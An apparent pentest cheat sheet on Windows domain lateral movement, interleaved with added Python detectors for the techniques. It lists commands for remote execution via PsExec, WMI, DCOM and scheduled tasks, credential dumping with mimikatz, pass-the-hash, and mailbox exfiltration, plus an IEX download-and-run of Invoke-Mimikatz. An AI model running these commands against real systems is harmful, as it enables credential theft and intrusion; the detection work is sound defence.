Title: Intra-Domain Lateral Movement Analysis

Intra-Domain Lateral Movement Analysis

Common Windows remote-connection commands

IPC

net use \\IP\ipc$ "password" /user:Administrator

Conditions for using IPC

Port 139 is open

The administrator has enabled the default (administrative) shares

Using built-in Windows tools to obtain remote host information

dir command

dir \\IP\c$

tasklist command

tasklist /S IP /U administrator /P password

Scheduled tasks

at command

Mainly on Windows Server versions before 2008

Check the target system time

net time \\IP

Copy the payload to the target system

copy payload.bat \\IP\C$

Create a scheduled task with the at command

at \\IP 8:00AM C:\payload.bat

Returns the scheduled task ID

Clear the at record

at \\IP taskID /delete

Use at to save the execution result on the remote host, then read the result:

at \\IP 8:00AM cmd.exe /c "ipconfig > C:\1.txt"

type \\IP\C$\1.txt

schtasks command

Establish an IPC connection

Create a scheduled task (named test here)

schtasks /create /s IP /tn test /sc onstart /tr c:\payload.bat /ru system /f

Run the scheduled task

schtasks /run /s IP /i /tn "test"

Delete the scheduled task

schtasks /delete /s IP /tn "test" /f
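From the defender's side, the at/schtasks procedure above leaves a recognisable trail in the target's Security log: a network logon (4624, LogonType 3) whose session then touches an administrative share (5140, the copy step) and creates a scheduled task (4698). The Python below is added here as an example and is not part of the original post; it correlates those three events by LogonId over constructed sample records. The field names are the standard Security log fields; the IP addresses, logon IDs and user names are made up.

```python
"""Correlate network logons with admin-share access and remote task creation.

Security events used (standard Windows field names):
  4624  logon; LogonType 3 = network logon, carries the source IpAddress
  5140  network share object accessed; ShareName such as \\*\IPC$ or \\*\C$
  4698  scheduled task created (at / schtasks)
All records below are constructed sample data, not real logs.
"""
from collections import defaultdict

ADMIN_SHARES = {r"\\*\IPC$", r"\\*\C$", r"\\*\ADMIN$"}

SAMPLE_EVENTS = [
    # remote operator: network logon, then IPC$ + C$ access, then a task
    {"EventID": 4624, "LogonType": 3, "TargetLogonId": "0x3e9a1",
     "TargetUserName": "administrator", "IpAddress": "10.0.0.25"},
    {"EventID": 5140, "SubjectLogonId": "0x3e9a1",
     "SubjectUserName": "administrator", "ShareName": r"\\*\IPC$"},
    {"EventID": 5140, "SubjectLogonId": "0x3e9a1",
     "SubjectUserName": "administrator", "ShareName": r"\\*\C$"},
    {"EventID": 4698, "SubjectLogonId": "0x3e9a1",
     "SubjectUserName": "administrator", "TaskName": r"\test"},
    # local console user creating a backup task: same event, no network logon
    {"EventID": 4624, "LogonType": 2, "TargetLogonId": "0x1b2c3",
     "TargetUserName": "alice", "IpAddress": "-"},
    {"EventID": 4698, "SubjectLogonId": "0x1b2c3",
     "SubjectUserName": "alice", "TaskName": r"\Backup"},
    # ordinary file-share access over the network: not an admin share
    {"EventID": 4624, "LogonType": 3, "TargetLogonId": "0x77aa0",
     "TargetUserName": "bob", "IpAddress": "10.0.0.31"},
    {"EventID": 5140, "SubjectLogonId": "0x77aa0",
     "SubjectUserName": "bob", "ShareName": r"\\*\Public"},
]


def index_network_logons(events):
    """Map each network-logon LogonId to the IP address that produced it."""
    return {
        e["TargetLogonId"]: e.get("IpAddress", "-")
        for e in events
        if e.get("EventID") == 4624 and e.get("LogonType") == 3
    }


def find_remote_admin_activity(events):
    """Return (kind, source_ip, user, detail) for admin-share access and
    scheduled-task creation performed from a network logon session."""
    sessions = index_network_logons(events)
    alerts = []
    for e in events:
        ip = sessions.get(e.get("SubjectLogonId"))
        if ip is None:
            continue  # local session, or logon not seen in this batch
        if e["EventID"] == 4698:
            alerts.append(("remote_task_created", ip, e["SubjectUserName"], e["TaskName"]))
        elif e["EventID"] == 5140 and e.get("ShareName") in ADMIN_SHARES:
            alerts.append(("admin_share_access", ip, e["SubjectUserName"], e["ShareName"]))
    return alerts


def find_copy_then_schedule(events):
    """Higher-confidence signal: one network session both touched an admin
    share (the copy step) and created a task (the at/schtasks step)."""
    kinds = defaultdict(set)
    for kind, ip, user, _ in find_remote_admin_activity(events):
        kinds[(ip, user)].add(kind)
    return sorted(k for k, v in kinds.items()
                  if {"admin_share_access", "remote_task_created"} <= v)


if __name__ == "__main__":
    for alert in find_remote_admin_activity(SAMPLE_EVENTS):
        print(*alert)
    print("copy-then-schedule chains:", find_copy_then_schedule(SAMPLE_EVENTS))
```

The correlation key matters: 4698 carries no source address, so it is the logon session (SubjectLogonId back to the 4624 TargetLogonId) that ties the task creation to a remote host. Object-access auditing for file shares must be enabled for 5140 to exist at all.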

Obtaining Windows hashes

Dumping passwords on a single machine

GetPass

GetPassword_x64.exe

PwDump7

PwDump7.exe

Dumping passwords from the SAM and SYSTEM files

Export the SAM and SYSTEM hives

reg save hklm\sam sam.hive

reg save hklm\system system.hive

Obtain the NTLM hash by reading the SAM and SYSTEM files

mimikatz

lsadump::sam /sam:sam.hive /system:system.hive

cain

Read the local SAM directly with mimikatz on the target machine

privilege::debug

lsadump::sam

Read the SAM online with mimikatz

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

Read an lsass.dmp file offline with mimikatz

Export the lsass.dmp file

Export lsass.dmp using Task Manager

In Task Manager, find the lsass.exe process, right-click it and select "Create dump file".

Export lsass.dmp using Procdump

An officially released Microsoft tool, which the author notes is not flagged by antivirus

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extract the password values from lsass.dmp with mimikatz

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords full

Dump hashes with PowerShell

Import-Module .\Get-PassHashes.ps1

Load mimikatz remotely with PowerShell to dump hashes and plaintext passwords

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Pass-the-hash attacks

Pass-the-hash with an NTLM hash

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /ntlm:[NTLM]"

Pass-the-hash with an AES-256 key

Dump the AES-256 key with mimikatz

mimikatz "privilege::debug" "sekurlsa::ekeys"

pth attack (the target machine must have KB2871997 installed)

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /aes256:[aes256]"

Pass-the-ticket

Pass-the-ticket with mimikatz

Export tickets

mimikatz "privilege::debug" "sekurlsa::tickets /export"

Inject a ticket

mimikatz "kerberos::ptt C:\xxx.kirbi"

Pass-the-ticket with kekeo

Generate the ticket file

kekeo "tgt::ask /user:administrator /domain:pentest.hacker /ntlm:[NTLM]"

Import the ticket file into memory

kekeo "kerberos::ptt xxx.kirbi"

Using PsExec

PsExec from the PsTools suite

Establish an IPC connection

net use \\IP\ipc$ "password" /user:administrator

Obtain an interactive shell with SYSTEM privileges

PsExec.exe -accepteula \\IP -s cmd.exe

or

PsExec.exe -accepteula \\IP -s cmd.exe /c ipconfig

Without the -s switch, the shell is created with Administrator privileges instead of SYSTEM.

If no IPC connection has been established:

PsExec.exe -accepteula \\IP -u administrator -p password -s cmd.exe

The psexec modules in Metasploit

exploit/windows/smb/psexec

exploit/windows/smb/psexec_psh (PowerShell version)

Using WMI

Basic command

wmic /node:IP /user:administrator /password:password process call create "cmd.exe /c ipconfig > ip.txt"

After establishing an IPC connection, read the result with the type command:

type \\IP\C$\ip.txt

wmiexec from the impacket package

wmiexec.py administrator:password@IP

wmiexec.vbs

Semi-interactive shell

cscript.exe //nologo wmiexec.vbs /shell IP administrator password

Execute a single command

cscript.exe wmiexec.vbs /cmd IP administrator password "ipconfig"

For commands with longer run times, such as ping and systeminfo, pass -wait 5000 or a longer wait time. For programs such as nc that return no output and need to keep running, the -persist parameter is required.

Invoke-WmiCommand

From the PowerSploit toolkit

Import Invoke-WmiCommand.ps1 into the session

$User = 'pentest.hacker\administrator'

$Password = ConvertTo-SecureString -String 'password' -AsPlainText -Force

$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, $Password

$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName IP

$Remote.PayloadOutput

Invoke-WmiMethod

Use the Invoke-WmiMethod cmdlet built into PowerShell; it is non-interactive and returns no output.

$User = 'pentest.hacker\administrator'

$Password = ConvertTo-SecureString -String 'password' -AsPlainText -Force

$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, $Password

$Remote = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'calc.exe' -Credential $Cred -ComputerName IP

EternalBlue vulnerability

auxiliary/scanner/smb/smb_ms17_010

exploit/windows/smb/ms17_010_eternalblue

smbexec

C++ version of smbexec

Upload execserver.exe to the C:\Windows\ directory of the target system and lift the UAC restriction on commands.

net use \\IP "password" /user:pentest\administrator

test.exe IP administrator password whoami c$

smbexec.py from the impacket toolkit

smbexec.py pentest/administrator:password@IP

Using DCOM on remote systems

Executing commands through local DCOM

Get the list of DCOM applications

Windows Server 2012 and above

Get-CimInstance Win32_DCOMApplication

Windows 7, Windows Server 2008

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

Execute an arbitrary command with DCOM

Locally, start a PowerShell session with administrator privileges

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","Minimized")

Execute commands on a remote machine with DCOM

When connecting remotely you must use an account with local administrator privileges

Connect to the remote computer over IPC$

net use \\IP "password" /user:pentest.hacker\win7user

Execute the command

Call MMC20.Application to execute a command remotely

$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IP"))

$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","Minimized")

Call CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39 (ShellWindows)

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','IP')

$obj = [System.Activator]::CreateInstance($com)

$item = $obj.Item()

$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
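Each remote execution method in the PsExec, WMI and DCOM sections above starts its command under a distinctive parent process on the target, which is what endpoint telemetry keys on: PsExec installs a service (System Event 7045, service name PSEXESVC) whose stub PSEXESVC.exe spawns the shell, WMI process creation (wmic, wmiexec, Invoke-WmiMethod) runs the child under WmiPrvSE.exe, and the MMC20.Application path runs it under mmc.exe. The Python below is an added example, not the post's own code; it classifies constructed Security 4688 and System 7045 records by that lineage. The parent-to-technique mapping is the assumption the example rests on, and the ShellWindows CLSID path is deliberately left out because its parent, explorer.exe, is far too common to key on.

```python
"""Parent-process and service-install checks for remote execution.

Constructed sample records use Security 4688 (process creation, with
ParentProcessName) and System 7045 (new service installed) field names.
"""
import ntpath

# Parent image -> technique. This mapping is the example's assumption.
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe": "wmi_process_create",   # wmic / wmiexec / Invoke-WmiMethod
    "psexesvc.exe": "psexec",               # PsExec service stub
    "mmc.exe": "dcom_mmc20_application",    # MMC20.Application.ExecuteShellCommand
}
SHELLS = {"cmd.exe", "powershell.exe"}
SHELL_TOKENS = ("cmd.exe", "powershell", "%comspec%")

SAMPLE_4688 = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "SubjectUserName": "administrator", "CommandLine": "cmd.exe /c ipconfig > ip.txt"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\mmc.exe",
     "SubjectUserName": "win7user", "CommandLine": "cmd.exe /c calc.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\PSEXESVC.exe",
     "SubjectUserName": "SYSTEM", "CommandLine": "cmd.exe"},
    # benign: a user opens a shell from Explorer
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "SubjectUserName": "alice", "CommandLine": "cmd.exe"},
    # benign: WMI provider host spawning a non-shell helper
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\conhost.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "SubjectUserName": "SYSTEM", "CommandLine": "conhost.exe"},
]

SAMPLE_7045 = [
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # constructed illustration of a service whose image path is a shell
    # command line rather than a binary (the Metasploit psexec pattern)
    {"EventID": 7045, "ServiceName": "xKQjWzLp",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e AAAA"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]


def classify_process_creation(e):
    """Return the technique name when a shell is spawned by a known remote
    execution parent, else None."""
    child = ntpath.basename(e["NewProcessName"]).lower()
    parent = ntpath.basename(e["ParentProcessName"]).lower()
    if child in SHELLS and parent in REMOTE_EXEC_PARENTS:
        return REMOTE_EXEC_PARENTS[parent]
    return None


def classify_service_install(e):
    """Flag PsExec's service and services whose image path is a shell
    command line rather than an executable."""
    path = e["ImagePath"].lower()
    if e["ServiceName"].upper() == "PSEXESVC":
        return "psexec_service"
    if any(tok in path for tok in SHELL_TOKENS):
        return "service_with_shell_command"
    return None


def scan(events):
    """Return (technique, user_or_service, detail) for every flagged record."""
    alerts = []
    for e in events:
        if e["EventID"] == 4688:
            kind = classify_process_creation(e)
            if kind:
                alerts.append((kind, e["SubjectUserName"], e["CommandLine"]))
        elif e["EventID"] == 7045:
            kind = classify_service_install(e)
            if kind:
                alerts.append((kind, e["ServiceName"], e["ImagePath"]))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_4688 + SAMPLE_7045):
        print(*a)
```

4688 only carries ParentProcessName and CommandLine when process-creation auditing and command-line logging are enabled; Sysmon Event 1 provides the same fields (Image, ParentImage, CommandLine) and the same classification applies to it.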

Using SPNs in a domain environment

SPN scanning

PowerShell-AD-Recon

Use SPNs to discover all MSSQL services in the domain

Import-Module .\Discover-PSMSSQLServers.ps1

Discover-PSMSSQLServers

Scan all SPN information in the domain

Import-Module .\Discover-PSInterestingServices.ps1

Discover-PSInterestingServices

Without third-party PowerShell scripts, the following command queries all SPN information

setspn -T domain -Q */*

Attacking Exchange mail servers

Discovering Exchange services

Discovery by port scan

nmap -A -O -sV IP

SPN query

setspn -T pentest.hacker -F -Q */*

Basic Exchange operations

View the mailbox databases

Add-PSSnapin Microsoft.Exchange*

Get-MailboxDatabase -Server "Exchange1"

Specify a database and query its details

Get-MailboxDatabase -Identity "Mailbox Database 1894576043" | Format-List Name,EdbFilePath,LogFolderPath

Get the email addresses of existing users

Get-Mailbox | Format-Table Name,WindowsEmailAddress

View mailbox usage information for a specified user

Get-MailboxStatistics -Identity administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

Get the number of messages in users' mailboxes

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Descending

Export specified emails

Configure the user's import/export permission

View the user's permissions

Get-ManagementRoleAssignment -Role "Mailbox Import Export" | Format-List RoleAssigneeName

Add the permission

New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"

Remove the permission

Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false

Set up a network shared folder

net share inetpub=c:\inetpub /grant:everyone,full

Export the user's email

New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst

Manage export requests

View previous export records

Get-MailboxExportRequest

Delete a specified user's completed export request

Remove-MailboxExportRequest -Identity Administrator\mailboxexport

Delete all completed export requests

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest
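The export procedure above consists entirely of administrative cmdlets, so every step is recorded by Exchange's admin audit log (the records Search-AdminAuditLog returns, with Caller, CmdletName and CmdletParameters). The Python below is an added example and not part of the post; it scans constructed audit-log style records for the three steps of the procedure: granting the Mailbox Import Export role, a New-MailboxExportRequest writing a .pst to a UNC path, and clean-up with Remove-MailboxExportRequest. The list of approved export destinations and the caller names are assumptions made up for the example.

```python
"""Scan Exchange admin-audit-log style records for mailbox export activity.

Each record mirrors what Search-AdminAuditLog returns: Caller, CmdletName and
a list of (parameter name, value) pairs. All records are constructed samples.
"""
from collections import defaultdict

# UNC prefixes the mail team genuinely uses for exports (assumption).
APPROVED_EXPORT_PREFIXES = ("\\\\backup01\\exports\\",)

SAMPLE_AUDIT = [
    {"Caller": "pentest.hacker/Users/Administrator", "CmdletName": "New-ManagementRoleAssignment",
     "CmdletParameters": [("Name", "Import Export_Domain Admins"), ("User", "Administrator"),
                          ("Role", "Mailbox Import Export")]},
    {"Caller": "pentest.hacker/Users/Administrator", "CmdletName": "New-MailboxExportRequest",
     "CmdletParameters": [("Mailbox", "administrator"),
                          ("FilePath", r"\\10.0.0.25\inetpub\administrator.pst")]},
    {"Caller": "pentest.hacker/Users/Administrator", "CmdletName": "Get-MailboxExportRequest",
     "CmdletParameters": [("Status", "Completed")]},
    {"Caller": "pentest.hacker/Users/Administrator", "CmdletName": "Remove-MailboxExportRequest",
     "CmdletParameters": [("Identity", r"Administrator\mailboxexport")]},
    # routine: a mail admin exporting a leaver's mailbox to the approved share
    {"Caller": "pentest.hacker/Users/mailadmin", "CmdletName": "New-MailboxExportRequest",
     "CmdletParameters": [("Mailbox", "jdoe"), ("FilePath", r"\\backup01\exports\jdoe.pst")]},
]


def params(record):
    """Turn the (name, value) parameter list into a dict."""
    return dict(record["CmdletParameters"])


def export_findings(records):
    """Return (severity, caller, description) for each relevant cmdlet."""
    findings = []
    approved = tuple(p.lower() for p in APPROVED_EXPORT_PREFIXES)
    for r in records:
        p = params(r)
        name = r["CmdletName"]
        if name == "New-ManagementRoleAssignment" and p.get("Role") == "Mailbox Import Export":
            findings.append(("high", r["Caller"],
                             f'granted Mailbox Import Export to {p.get("User")}'))
        elif name == "New-MailboxExportRequest":
            path = p.get("FilePath", "")
            sev = "info" if path.lower().startswith(approved) else "high"
            findings.append((sev, r["Caller"],
                             f'exported mailbox {p.get("Mailbox")} to {path}'))
        elif name == "Remove-MailboxExportRequest":
            findings.append(("low", r["Caller"],
                             f'removed export request {p.get("Identity")}'))
    return findings


def callers_with_full_chain(records):
    """Callers who granted the role, exported to an unapproved path and then
    removed the request: the complete procedure from the post."""
    seen = defaultdict(set)
    for sev, caller, desc in export_findings(records):
        if desc.startswith("granted"):
            seen[caller].add("grant")
        elif desc.startswith("exported") and sev == "high":
            seen[caller].add("export")
        elif desc.startswith("removed"):
            seen[caller].add("cleanup")
    return sorted(c for c, s in seen.items() if s == {"grant", "export", "cleanup"})


if __name__ == "__main__":
    for f in export_findings(SAMPLE_AUDIT):
        print(*f)
    print("full export chains by:", callers_with_full_chain(SAMPLE_AUDIT))
```

Removing the export request deletes the request object, not the audit entry, so the clean-up step is itself a useful signal; the share created with net share in the procedure additionally shows up as Security Event 5142 on the host that published it.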
